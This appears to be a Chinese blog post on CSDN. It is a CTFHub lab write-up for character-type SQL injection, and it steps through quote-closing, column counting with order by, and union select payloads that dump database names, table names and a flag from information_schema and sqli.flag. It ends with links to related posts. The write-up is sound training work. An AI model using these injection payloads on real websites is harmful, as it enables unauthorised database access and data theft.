CTFHUB-SQL注入-字符型注入

最新推荐文章于 2024-06-08 13:42:36 发布
最新推荐文章于 2024-06-08 13:42:36 发布
阅读量327 收藏
点赞数
分类专栏: CTFHUB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014794539/article/details/118610126
版权

考点字符型SQL注入
分析过程
先输入个1 因为是字符型注入
0
一般先判断是否存在注入点

加单引号后变成三个单引号,则无法执行
playload:

?id='1''

2
playload:

’and 1=1

3
也不行
playload:

' and 1=1 --'

可以成功执行
4
playload:

 'and 1=2 --'

报错
然后判断列数
playload:

id='1' order by 3 -- ''
id='1' order by 2 -- ''

3时无回显则字段数量为2
1
查询是第几列有我们要的信息
playload:

id='' union select 1,2 --'

5
结果得到2,想要查询的信息就放在第二个列处。
playload:

'union select 1,user()--'

6
账户是root账户 所以可以访问information_schema数据库
查库名
playload:

' union select 1,database() -- '

7

获取所有数据库名
playload:

' union select 1,group_concat(schema_name) from information_schema.schemata -- '

8

查询sqli中的表
playload:

' union select table_schema, group_concat(table_name) from information_schema.tables where table_schema='sqli' -- '

8
查看flag
playload:

' union select 1,group_concat(flag) from sqli.flag -- '

9
得到flag

ctfhub{5fd4ce226298790e9fe1559d}
Pale1c
关注
专栏目录
[CTF] SQL注入的一些经验总结(未完待续)【更新:2022.11.25】
ZXW_NUDT的博客
11-17 6256
关于SQL注入的思维导图可以点开看一下大图
CTFHUB-web-SQL注入
ookami6497的博客
11-29 818
CTFHUB SQL
CTFHub 字符SQL注入
Leon~博客
03-14 4196
字符SQL注入 目录 一、判断是否存在注入 二、判断select语句中有几列 三、判断显示的信息是第几列的信息 四、利用函数来收集数据库信息 五、通过union查询数据库 1、获取所有数据库名称 2、查询数据库中有多少个表 3、查询指定数据库中的表名 4、查询指定数据库指定表中的列名 5、查询指定...
CTFHUB-SQL字符注入
Web学习之路
03-07 316
很简单的,用心
CTFHub:web前置技能-SQL注入-整数注入
最新发布
wdnmddbl的博客
06-08 747
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:sqlmap下载点我文章总结有我个人总结的一些知识点,希望对你有所帮助。大概思路和涉及的知识点sql注入基本语句和手工注入流程:#,–+,-- -代表后边忽略,常用与闭合思路:sql注入之数字注入点:许多网页链接有类似的结构。
ctfhubSQL注入字符注入
manerzi的博客
10-05 348
SQL注入字符注入
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1237
CTFHUB-WEB-SQL注入
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 430
个人CTF学习之路
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5490
Ctfhub解题 web SQL注入
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1118
ctfhubSQL注入中的flag是动态生成的 1、整数注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
SQL注入学习记录 CTFHub SQL注入 字符注入
qq_45653588的博客
05-25 1011
打开页面后,可以看见界面和整数注入长得差不多: 先输入1,回显: 然后输入1',得到: 自动给我们加上了单引号,这也是和整数注入的区别,字符注入参数需要单引号来闭合,整数不需要。 这里如果接着想在后面输入语句的话,就要手动给参数加上单引号,然后将他加上的单引号注释掉。 Mysql 有三种常用注释符: – 注意,这种注释符后边有一个空格 # 通过#进行注释 /* */ 注释掉符号内的内容 于是我们输入1' and 1=1#,将1作为id的参数,用#将他自带的单引号注释掉,回显: 然后通过orde
CTFHub (web-SQL-字符注入)
m0_64444909的博客
04-29 2598
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 阅读目录一、limit和group_concat查询的区别二、对字符数据的解释三、实战解题步骤1.进入靶场, 一、limit和group_concat查询的区别 1.列出所有数据库 limit 一个一个打印出来库名 group_concat 一次性全部显示 2.列出(数据库: )中所有的表名 limit 一个一个打印出来表名 group_concat 一次性全部显示 3.列出(数据库: 表:)中所有的字段名 limit 一个.
CTFHUB-技能树-Web题-SQL注入-字符注入
Static______的博客
03-29 473
对于字符注入,可在url中输入。由此判断回显字段为1,2字段。由此判断字段数为两个。
CTFHUB-WEB-字符SQL注入
xixihahawuwu的博客
12-24 332
CTFHUB-WEB-字符SQL注入 我们先就这此题来了解下如何去判断是否是字符注入 如何去判断 1.加单引号,由于固定情况下,数据库此时的语句为select * from table where name = ‘admin’ ,加入单引号会引起报错,页面不回返 id=1' 2.加入 ?id=1' and 1=1 这里就需要加注释来进行绕过 一开始我想使用#来进行注释,结果发现被网页转码了,我们换一种注释–,为了防止再次被转码,我们在–后面加上+ id=1' and 1=1--+ 3.输入 id=
CTFHub | web—SQL注入字符注入
2301_76435948的博客
09-26 276
如果满足以上三点,可以判断该url为字符注入。服务端的sql语句为:select 列 from 数据库.表 where name=‘$name’
CTFHUB——字符注入
陈艺秋的博客
01-14 468
sql整数注入
CTFHub SQL字符注入
weixin_44732566的博客
02-17 3551
CTFHub SQL字符注入 题目说的很清楚,字符注入,需要注意引号和注释 和整数注入一样,回显只有两处:ID和Da,直接上联合查询 123’ union select database(),2 # 得到数据库,接着查表 123' union select group_concat(table_name),3 from information_schema.tables where ta...
CTFHUB 字符注入
qq_63875498的博客
12-04 204
CTFHUB 字符注入
ctfhub-sql注入-字符注入
m0_62094846的博客
11-12 684
说明输入1不能给我们有用的信息,但输入1'会显示错误 查询字符注入,可以输入1"试试 没有报错(不过好像目前没什么用,确定字段数时用1’也一样),记得一定一定加#,不然没用 有2个字段数 确定回显位 语句只能放在第二个位上 查找数据库 猜测在sqli里 查找表 查找字段 ...
ctfhub字符注入
09-18
ctfhub字符注入是一种常见的网络安全漏洞,针对的是Web应用程序中的输入字段,攻击者可以通过注入恶意字符实现对数据库的非法操作或获取敏感信息。 字符注入的原理是利用对用户输入数据的过滤不足,未对特殊...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值